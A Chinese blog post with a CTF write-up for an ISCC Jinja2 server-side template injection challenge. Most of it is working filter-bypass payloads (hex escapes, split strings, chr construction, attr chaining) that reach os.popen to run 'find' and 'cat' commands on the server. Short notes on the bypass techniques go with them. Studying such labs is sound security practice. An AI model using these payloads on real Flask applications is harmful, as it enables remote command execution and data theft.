ISCC SSTI

最新推荐文章于 2024-03-10 18:58:06 发布
最新推荐文章于 2024-03-10 18:58:06 发布
阅读量2.2k 收藏 16
点赞数 6
分类专栏: ISCC web 文章标签: unctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/116953370
版权
web 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
ISCC
2 篇文章 0 订阅
订阅专栏

先找参数吧,通过信息搜集,参数是xiaodouni 就是小豆泥的英文,这个是暹罗猫的一个名字吧

然后直接放两个payload的吧
看不懂的可以看一下我以前的文章CTFshow ssti里面讲了思路,这里就不再解释了。

{%set pp=(dict(pop=a))|join%}
{%set xiahua=(lipsum|select|string|list)|attr(pp)(24)%}
{%set g=(lipsum|select|string|list)|attr(pp)(1)%}
{%set gb=(xiahua,xiahua,g,dict(bals=a,lo=a)|join,xiahua,xiahua)|join%}
{%set gm=(xiahua,xiahua,g,dict(e=a,titem=a)|join,xiahua,xiahua)|join%}
{%set bl=(xiahua,xiahua,dict(builtins=a)|join,xiahua,xiahua)|join%}
{%set chcr=(lipsum|attr(gb)|attr(gm)(bl))|attr("ge""t")("ch""r")%}
{%set dian=chcr(46)%}
{%set space=chcr(32)%}
{%set xing=chcr(42)%}
{%set shell=("cat ","requirements",dian,"txt")|join%}
{%set shell2=("find / -name ",xing,"fl","ag",xing)|join%}
{%set shell3=("cat /usr/fl","ag",xiahua,"is",xiahua,"here",dian,"txt")|join%}
{{ lipsum|attr(gb)|attr(gm)("o""s")|attr("po""pen")(shell3)|attr("read")()}}

{% set xiahua=(config|string)[14]%}
{% set gb=(xiahua,xiahua,"globals",xiahua,xiahua)|join %}
{% set bl=(xiahua,xiahua,"builtins",xiahua,xiahua)|join %}
{% set cr=(lipsum|attr(gb)|attr("get")(bl))["ch""r"] %}
{% set dian=cr(46)%}
{% set xing =cr(42)%}
{% set shell=("find / -name ",xing,"fla",xing)|join%}
{% set shell4 = "cat /usr/fla??is?here?txt"%}
{{(lipsum|attr(gb)|attr("get")("o""s")|attr("po""pen")(shell4))|attr("read")()}}

然后后面是我写给我自己看的,有兴趣的也可以看一下。。。

首先是反思吧,通过这个题,发现自己对ssti的理解和应用并不好。。。
然后jinja是python的模板,多想想python,python菜得一匹。。。。

第一个

如果用第一个方法可以发现题目就改了一下,你像构造os,题搞出来的就是so,换了位置也是这样(是题设置的)
在这里插入图片描述
解决

1 用jinja里的reverse过滤器,作用简单说就是反转对象

在这里插入图片描述

在这里插入图片描述

2 用[::-1]

在这里插入图片描述

第二个

就是为什么ssti可以用16进制加密和unicode绕过,感觉就是会解析16进制吧,可能不太准确。。。
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

只要没过滤\x,通过这个第二个payload就可以更简单,可以直接用16进制绕过,就不用构造特殊字符了。。。,不爽就直接用16绕,什么laji过滤,请再猛点。。。。

{% set gb="\x5f\x5fglobals\x5f\x5f" %}
{% set bl="\x5f\x5fbuiltins\x5f\x5f" %}
{% set cr=(lipsum|attr(gb)|attr("get")(bl))["\x63\x68\x72"] %}
{% set shell=("\x66\x69\x6e\x64\x20\x2f\x20\x2d\x6e\x61\x6d\x65\x20\x2a\x66\x6c\x61\x67\x2a")|join%}  #find / -name *flag*
{% set shell4 = "\x63\x61\x74\x20\x2f\x75\x73\x72\x2f\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2e\x74\x78\x74"%}  #cat /usr/flag_is_here.txt
{{(lipsum|attr(gb)|attr("get")("o""s")|attr("po""pen")(shell4))|attr("read")()}}

第三个

这个其实之前ssti就想过。。。然后问师傅也解决了,然后也没归纳,就一起写这吧。。
在这里插入图片描述
主要是最后这句话,,,,

就是用attr代替点绕过的时候,如果后面是属性可以直接用attr,如果是项目的话,就还要套中括号

4

这个是另一个大师傅的payload,然后我从里面学到的就是活用config|string()|select|stringlipsum|select|string,之前我™以为这三个是一样。。。这™怎么可能一样呢真傻逼。。。主要没去想string是干嘛,就直接去用了,稍微一下也该知道是干嘛的。。。可以看下下面的图

{% set xiahuaxian=(config|string)[14]%}
{% set gb=(xiahuaxian,xiahuaxian,"globals",xiahuaxian,xiahuaxian)|join %}
{% set bt=(xiahuaxian,xiahuaxian,"builtins",xiahuaxian,xiahuaxian)|join %}
{% set ccfhr=(lipsum|attr(gb)|attr("get")(bt))["ch""r"] %}
{% set qie = ccfhr(38)%}
{% set oofss=lipsum|attr(gb)|attr("get")("o""s")%}
{% set dian=(config|string)[798]%}
{% set xing =ccfhr(42)%}
{% set shell=("find / -name ",xing,"fla",xing)|join%}
{% set shell4 = "cat /usr/fla??is?here?txt"%}
{{(oofss|attr("po""pen")(shell4))|attr("read")()}}

这里面就有很多有用的特殊字符像 '_' , '/ ' , '.'(点)
在这里插入图片描述
就看看就行了。。。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Je3Z
关注
专栏目录
SSTI 学习
victoriesuuo的博客
04-01 829
bugku的simple ssti 打开题目看到需要上穿一个flag的参数 打开原代码查看提示需要用到flask的模板注入(Flask是一个基于Python的Web开发微框架。)利用get的方式传参flag={{config.SECRET_KEY}}即得到flag。(在Flask项目中,我们会用到很多配置(Config)Flask的配置对象(config)是一个字典的子类(subclass),所以你可以把配置用键值对的方式存储进去。这是一个通用的处理接口,Flask内置的配置,扩展提供的配置,你
ISCC2022题目附件
06-06
2022ISCC所有题目附件,包含ISCC2022-练武题附件和ISCC2022-擂台题附件 信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越...
ISCC 2021 SSTI
E1even的博客
06-21 558
ISCC中遇到了一道SSTI的题目,拿来练练手,题目难度的化,相对于普遍的过滤来说,这个过滤要更狠一点把。 看题: 进去之后是这样的,也没有提示传参,但是题目是lovely ssti 盲猜who am i 传参点应该是这个表情,这里仕林哥哥直接告诉了表情包叫xiaodouni,我就不去信息搜集了 FUZZ测试: 测试结果: 过滤了:_ ‘’ requests chr . chr 实操过程中还出现了字符串反转 思路: 过滤 . : 采用 |attr可以绕过 过滤单引号: 可以用双引号或
SSTI
DonkeyMoon的博客
11-14 763
模板注入在py2和py3中有些不同,但是没有本质上的区别。 模板注入的流程:找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。 几个魔术方法: class 返回类型所属的对象 mro 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 base 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 subclasses 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列
ISCC
Leo8283的博客
05-02 2664
ISCC客服冲冲冲 这里肯定是写一个脚本去自动化点击左边那个按钮,我本来想不会,百度一下发现还是很简单的一串js,果然还是要去学习脚本语言 console里添加 setInterval(function(){document.getElementById("按钮id").click();},1); setInterval(function(){document.getElementById("left_button").click();},1); https://www.jb51.net/article
SSTI(服务器端模板注入)
z4yn:)的博客
02-26 483
SSTI(服务器端模板注入) 0x01 简介 模板引擎允许开发人员使用带有动态元素的静态HTML页面。例如,静态配置文件.html一个模板引擎将允许开发人员设置一个用户名参数,该参数将始终设置为当前用户的用户名 服务器端模板注入是指用户能够传入一个参数,该参数可以控制服务器上运行的模板引擎。 例如: 这引入了一个漏洞,因为它允许黑客将模板代码注入网站。从XSS一直到RCE,其影响可能是毁灭性的。 注意:不同的模板引擎具有不同的注入有效负载,但是通常您可以使用{{2+2}}作为测试来测试...
ISCC2021-MISC部分题目.zip
08-07
ISCC2021-MISC部分题目.zip是一个与ISCC(International Symposium on Computer Science and Convergence,国际计算机科学与融合大会)相关的压缩包文件。这个压缩包可能包含了该会议的多份论文、研究报告或者竞赛...
ISCC题库.docx
05-23
ISCC2020比赛题库 ISCC ISCC ISCC ISCC
ISCC2021线上赛赛题.zip
05-19
ISCC2021线上赛赛题.zip wp见主页
CTF,ISCC各个隐写总结
08-29
ISCC( Invisible Steganographic Communication Challenge)是其中专注于隐写术的一个专门比赛。隐写术是一种信息隐藏技术,它允许数据被嵌入到各种媒体文件中,如图片、音频或视频,而不易被察觉。这篇总结将深入...
SSTI(服务器模板注入
jdk12123的博客
10-03 302
与sql注入类似:都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI就是服务器端模板注入(Server-Side Template Injection),SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,然后执行。
SSTI---总结
wwwwyyyrre的博客
06-12 2360
1)过滤[]和.只过滤[]pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。若.也被过滤,使用原生JinJa2函数|attr()将request.__class__改成request|attr("__class__")(2)过滤_利用request.args属性将其中的request.args改为request.values则利用post的方式进行传参(3)关键字过滤base64编码绕过__getattribute__使用实例访问属性时,调用该方法。
ISCC2023全国大学生网络信息安全竞赛
qq_57423018的博客
06-08 5142
信息安全已涉及到国家政治、经济、文化、社会和生态文明的建设,信息系统越发展到它的高级阶段,人们对其依赖性就越强,从某种程度上讲其越容易遭受攻击,遭受攻击的后果越严重。“网络安全和信息化是一体之两翼、驱动之双轮。没有网络安全就没有国家安全。”信息是社会发展的重要战略资源,国际上围绕信息的获取、使用和控制的斗争愈演愈烈,信息安全保障能力是综合国力、经济竞争实力和生存能力的重要组成部分,是世纪之交世界各国奋力攀登的至高点。
SSTI简介
最新发布
qq_74263993的博客
03-10 678
找一个可利用的function来执行,比如popen的话,就可以这样利用:''.__class__.__bases__[0].__subclasses__()[138].__init__.__globals__['popen']('dir').read()lipsum flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
学习ssti
n1ght的博客
11-23 435
ssti也叫做模板注入 当不正确的使用模板引擎进行渲染时,则会造成模板注入 比如render_template_string函数,当参数可控时,会造成模板注入 在Python的ssti中,大部分是依靠基类->子类->危险函数的方式来利用ssti python沙箱逃逸总结 这是别人的文章 __class__ 返回对象所属的类 __bases__以元组的形式返回一个类所直接继承的类 __base__以字符串返回一个类所直接继承的类。 __mro__返回解析方法调用的顺序。 __su
iscc wp
wsitcj的博客
05-28 455
WEB ISCC客服冲冲冲(一) 前端控制,所以解法很多,比如用连点器,或者在 Console 里搜一下,有个 votes,直接设置,这道题可以说有非常多解题方法了,这里就不再过多阐述 这是啥 直接复制到控制台回车 得到flag Web01 打开便提示Why don’t you take a look at robots.txt? 那就访问robots.txt看看呗,发现Disallow: /src/code/code.txt 所以就访问http://39.96.91.106:7040/code/code
iscc 2018
qq_40273198的博客
05-28 428
1.请ping我的ip 看你能Ping通吗?我都过滤了,看你怎么绕。题目地址:http://118.190.152.202:8018思路:命令注入经测试,?ip=xxx的确可以做到ping%0a截断linux 命令:ls /命令看根目录http://118.190.152.202:8018/index.php?ip=127.0.0.1%0Als%20/看到如下目录ls -lR /home查看每个文...
SSTI 学习笔记
m0_63253040的博客
03-13 3326
PHP SSTI(Twig) 学习文章 进入环境,左上角有flag,hint 都检查看看 flag页面显示ip,hint页面源代码有提示 考虑XFF头或者referer头 测试一下 注:这里不用加上“;” 出来了 python flask ssti 学习文章 原理:因为对输入的字符串控制不足,把输入的字符串当成命令执行。 漏洞产生主要原因:render_template渲染函数的问题 渲染函数在渲染的时候,往往对用户输入的变量不做渲染,..
SSTI简单总结和例题
Aiwin的博客
07-21 2918
SSTI简单总结和例题CISCN 2019华东南]Double Secret和[护网杯 2018]easy_tornado
ISCC where
09-08
ISCC是指"Intelligent Self-Configuring Cluster",其中的"ISCC"表示智能自配置集群。在ISCC中,有两种集群形式,一种是分散式集群,另一种是集中式集群。在分散式集群中,每个节点都有潜力成为簇头,而在集中式集群...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值